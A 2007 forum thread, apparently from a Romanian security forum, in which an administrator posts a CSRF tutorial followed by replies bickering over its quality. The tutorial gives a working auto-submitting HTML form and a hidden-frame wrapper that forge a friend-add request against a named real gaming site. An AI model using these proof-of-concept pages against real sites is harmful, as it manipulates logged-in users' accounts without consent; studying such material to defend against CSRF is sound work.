Old 11-17-2007, 02:52 PM   #1 (permalink)
moubik (Administrator)

CSRF (Cross Site Request Forgery) tutorial


A simple CSRF tutorial

Cross Site Request Forgery. What does it actually mean?
First let's check a site out:
[Only registered users can see the links.]

Create an account.
I've created an account named "websecurity.ro". Login and select Autologin.
What does autologin mean? It means that it saves the cookie and every time I enter that page I will be automatically logged in (this is very important in CSRF).

Let's see for example how I can add a friend:
[Only registered users can see the links.]
Nice, I can add myself as a friend.
I've added myself as a friend.

Let's see what the addfriend form looks like (I'll use the webdeveloper plugin for firefox):

<form action="admin/friends.php" method="post">
<input name="sql" value="a_f" type="hidden" />
<input name="f_name" style="width: 150px" type="text" />
<input value="Add user to my friends list" type="submit" />
</form>

from this code we can create this auto submitting html:

<form action="http://sc.gosugamers.net/admin/friends.php" method="post" name="dude">
<input name="sql" value="a_f" type="hidden" />
<input name="f_name" style="width: 150px" type="text" value="websecurity.ro" />
<input value="Add user to my friends list" type="submit" />
</form>
<script>
setTimeout("document.dude.submit()", 2000);
</script>

We can save this code as gosugamers_csrf.html
Anyone who is already logged in to sc.gosugamers.net and opens gosugamers_csrf.html will automatically add "websecurity.ro" as their friend.

PoC: gosugamers_csrf.html

This is one of the most harmless CSRFs that you can create on their website.

I don't really like how this piece of code gets executed, because the user can see that the request has been made and can undo it immediately.

Let's create another html:

<html>
<head></head>
<frameset rows="100%,0%">
<frame src="somecoolpage.html">
<frame src="gosugamers_csrf.html" name="littleframes">
</frameset>
</html>

And save it as gosugamers_hidden_csrf.html

This one loads 2 pages:
- somecoolpage.html that will blind the user who enters the page;
- gosugamers_csrf.html that will be almost invisible for the user.

The final CSRF PoC:
gosugamers_hidden_csrf.html

original article on [Only registered users can see the links.]
[Only registered users can see the links.]
__________________
you wouldn't like me when i'm angry.
Old 11-17-2007, 03:32 PM   #2 (permalink)
tw8 (Registered Users)

Honestly, it seems a bit weak to me. You didn't really explain the code, and for those who don't already know something about CSRF and some HTML it isn't much use, while for those who do, it's no use at all. I think you should have explained it a bit better.
Other than that, all good.
Good luck :P!
__________________

There are 10 kinds of people: those who understand binary and those who don't.
Old 11-17-2007, 03:55 PM   #3 (permalink)
moubik (Administrator)
it's not explained for your grandma. accept it and shut up.
Old 11-17-2007, 04:17 PM   #4 (permalink)
tw8 (Registered Users)

From now on I'll remember. Whenever you make a tutorial, I'll say, no matter how good (or bad :P) it is, that I liked it very much, because I see that honesty annoys you.

Good luck :P!
Old 11-17-2007, 04:22 PM   #5 (permalink)
moubik (Administrator)

grow up.
do you want me to put requirements on reading this tutorial?
Old 11-17-2007, 04:24 PM   #6 (permalink)
tw8 (Registered Users)

Quote:
Originally Posted by moubik
grow up.
I'm not the one who doesn't accept other people's opinions. Every time I made a tutorial I received both praise and criticism. But each time the criticism was different; I never got the same comments twice, because I take other people's advice into account.
P.S.: If you want to keep "arguing" about ideas, I'm waiting for you in PM, so we don't go off-topic.
Old 11-17-2007, 04:30 PM   #7 (permalink)
moubik (Administrator)

you've taught me a life lesson. now I feel fulfilled.
are you a kid by any chance? because I see you feel important
Old 11-17-2007, 04:38 PM   #8 (permalink)
tw8 (Registered Users)

Quote:
Originally Posted by moubik
because I see you feel important
What makes you think that?
Old 11-18-2007, 12:16 AM   #9 (permalink)
d3v1l (Registered Users)

Quote:
Originally Posted by moubik
are you a kid by any chance? because I see you feel important
you're both "kids", because if you were mature guys you wouldn't argue over nothing. btw..

My opinion? I don't see the point of a tutorial written in "English" and posted here on a Romanian forum (given that there are hardly any foreign registered users, and the very few there are come here only for "tools" and "exploits", not at all for tutorials!

More? Why the hell do you post replies in Romanian when this thread is only for "Tutoriale in engleza"? Or should I understand that these are "tutorials in English" for Romanians?
Copywr0ng (c) 2009 Miercuri catre Joi - RST